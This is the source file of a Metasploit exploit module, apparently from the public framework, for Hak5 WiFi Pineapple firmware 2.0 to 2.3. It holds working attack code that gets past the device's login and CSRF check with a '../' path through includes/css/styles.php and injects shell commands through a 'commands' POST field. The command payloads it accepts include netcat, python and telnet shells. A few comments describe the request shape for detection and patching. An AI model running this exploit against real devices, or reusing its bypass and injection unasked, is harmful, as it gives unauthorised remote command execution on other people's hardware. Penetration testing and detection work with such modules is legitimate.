metasploit-framework/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
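# Metasploit module for the login/CSRF check bypass and command injection in
# Hak5 WiFi Pineapple firmware; the description below gives the affected range
# as 2.0 <= version < 2.4, so firmware 2.4 and later is outside it.
#
# Request shape this module produces (useful when writing a detection or when
# verifying that a device is no longer affected): a POST to RPORT (default
# 1471) whose path starts with includes/css/styles.php, climbs back up with
# "../" segments to TARGETURI, and carries an `execute` query parameter plus a
# `commands` form field.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, the three user-facing options and removes the
  # inherited options this module does not use.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
      'Description'    => %q{
        This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
        These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
        Provided as part of the TospoVirus workshop at DEFCON23.
      },
      'Author'         => ['catatonicprime'],
      'License'        => MSF_LICENSE,
      # No advisory or CVE reference is recorded for this module.
      'References'     => [ ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        => {
        'Space'       => 2048,
        'DisableNops' => true,
        'Compat'      =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic python netcat telnet'
          }
      },
      'Targets'        =>
        [
          [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 1 2015'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
        Opt::RPORT(1471),
        Opt::RHOST('172.16.42.1')
      ]
    )

    deregister_options(
      'ContextInformationFile',
      'DOMAIN',
      'DigestAuthIIS',
      'EnableContextEncoding',
      'FingerprintCheck',
      'HttpClientTimeout',
      'NTLM::SendLM',
      'NTLM::SendNTLM',
      'NTLM::SendSPN',
      'NTLM::UseLMKey',
      'NTLM::UseNTLM2_session',
      'NTLM::UseNTLMv2',
      'SSL',
      'SSLVersion',
      'VERBOSE',
      'WORKSPACE',
      'WfsDelay',
      'Proxies',
      'VHOST'
    )
  end

  # Builds the request path: includes/css/styles.php, then "../../..", then
  # TARGETURI.
  # NOTE(review): presumably the styles.php prefix is what the device exempts
  # from its login/CSRF check -- confirm against the firmware source.
  #
  # @return [String] the normalized URI sent by cmd_inject
  def cmd_uri
    normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
  end

  # Sends one POST to cmd_uri with `cmd` in the `commands` form field.
  #
  # @param cmd [String] value placed in the `commands` POST variable
  # @return [Object, nil] whatever send_request_cgi returns (nil when no
  #   response was received)
  def cmd_inject(cmd)
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => cmd_uri,
      'vars_get'  => {
        'execute' => "" # Presence triggers command execution
      },
      'vars_post' => {
        'commands' => cmd
      }
    )
  end

  # Sends a bare `echo` and reports Vulnerable only when the device answers
  # HTTP 200 with a body containing "Executing"; every other outcome,
  # including no response at all, is reported as Safe.
  #
  # @return [Exploit::CheckCode] Vulnerable or Safe
  def check
    res = cmd_inject("echo")
    if res && res.code == 200 && res.body =~ /Executing/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Runs the check and sends the encoded payload only when the check reported
  # Vulnerable.
  def exploit
    print_status('Attempting to bypass login/csrf checks...')
    # check always returns a CheckCode, and both Vulnerable and Safe are
    # truthy, so a bare `unless check` could never reach fail_with and the
    # payload was sent even when the target did not respond as expected.
    # Compare against Vulnerable explicitly so the module stops instead.
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
    end

    print_status('Executing payload...')
    cmd_inject(payload.encoded)
  end
end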